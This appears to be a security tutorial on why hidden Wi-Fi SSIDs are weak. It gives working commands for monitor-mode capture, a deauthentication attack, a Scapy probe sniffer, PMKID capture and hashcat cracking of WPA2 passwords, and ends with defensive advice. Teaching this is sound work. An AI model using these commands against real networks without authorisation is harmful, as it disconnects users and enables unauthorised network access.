Hidden SSIDs are one of those security measures that feel effective but provide almost no real protection against a determined attacker. Here’s why — and exactly how they’re defeated.

Why Hidden SSIDs Exist (and Why They Don’t Help)

When a network administrator hides an SSID, the access point stops broadcasting its name in beacon frames. The SSID field is zeroed out. The idea is that potential attackers won’t know the network exists.

The problem: the SSID still appears in probe request and probe response frames. Any client that has previously connected to the network will actively probe for it, broadcasting the SSID into the air every time it looks for known networks.

Monitor mode is all you need to see it.

Step 1: Capturing the SSID Passively

1
2

sudo airmon-ng start wlan0
sudo airodump-ng wlan0mon

Hidden networks appear as <length: N> in airodump-ng output — the N tells you how many characters the SSID contains. Wait for a client to probe, and the SSID appears in the STATION section.

Step 2: Forcing the Reveal Actively

If no clients are actively probing, you can send a deauthentication frame to force a reconnect:

1
2

# Deauth a client to force it to probe
sudo aireplay-ng -0 3 -a <BSSID> -c <CLIENT_MAC> wlan0mon

When the client reconnects, its probe request contains the SSID in plaintext.

Step 3: Revealing with Scapy

For a more controlled approach:

1
2
3
4
5
6
7
8
9

from scapy.all import *

def sniff_probes(pkt):
    if pkt.haslayer(Dot11ProbeReq):
        ssid = pkt[Dot11Elt].info.decode('utf-8', errors='replace')
        if ssid:
            print(f"[+] Probe Request: {ssid} from {pkt[Dot11].addr2}")

sniff(iface="wlan0mon", prn=sniff_probes, store=False)

Step 4: Cracking the Password

Once you have the SSID, the attack surface is identical to any other WPA2 network. Capture the 4-way handshake or PMKID:

1
2
3
4
5
6
7
8

# PMKID capture with hcxdumptool (no client needed)
sudo hcxdumptool -i wlan0mon -o capture.pcapng --enable_status=1

# Convert for hashcat
hcxpcapngtool -o hashes.txt capture.pcapng

# Crack
hashcat -m 22000 hashes.txt wordlist.txt -r rules/best64.rule

The Bottom Line

Hidden SSIDs provide security through obscurity — and obscurity isn’t security. The SSID is always revealed in probe frames. Any client on the network will hand it to a passive observer.

If you’re relying on hidden SSIDs to protect a sensitive network segment, replace that with network segmentation, strong WPA3 passphrases, and certificate-based authentication.